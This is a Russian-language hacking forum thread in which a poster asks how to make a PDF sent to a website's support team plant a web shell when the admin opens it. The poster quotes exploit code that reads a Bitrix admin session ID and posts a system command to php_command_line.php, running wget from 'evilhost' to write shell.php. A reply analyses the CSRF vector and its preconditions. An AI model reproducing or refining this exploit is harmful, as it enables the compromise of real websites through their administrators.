Всем привет) Тут задался один такой вопрос. Как научить pdf файл выполнять команду GET и прочее ну например в чем загвоздка.. отправляем например админу сайта пдф файл через тех поддержку. он открывает пдф через браузер и бац.. на его сайт заливается шелл. вот кусок из xaker.ru var a = Get("http://targethost:6448/bitrix/admin/user_admin.php?lang=ru") var sessid = (Substr(a,At(a,"sessid=")+7,32)) Post("http://targethost:6448/bitrix/admin/php_command_line.php?mode=frame&lang=ru",Concat("sessid=",sessid,"&query=system%28%27wget http://evilhost:6448/s.txt –O shell.php%27%29%3B"),"application/x-www-formurlencoded") зы: куда отнести тему я не определился)
Ну тут приведён эксплойт для Битрикса где (похоже) нет защиты от CSRF атак посредством токенов. Хотя всё же есть переменная сессии =) Именно её твой эксплойт парсит и передаёт в скрипт загрузки файла на сервер. Значит для успешной атаки тебе необходимо знать название сайта, в том числе полный путь до админки. А также чтобы админ оо время прочтения пдф был стопроцентно залогинен в админке. И чтобы письмо прочёл именно админ а не юзверь. Ну в общем то куча ограничений, но теоретически возможный вектор атаки.
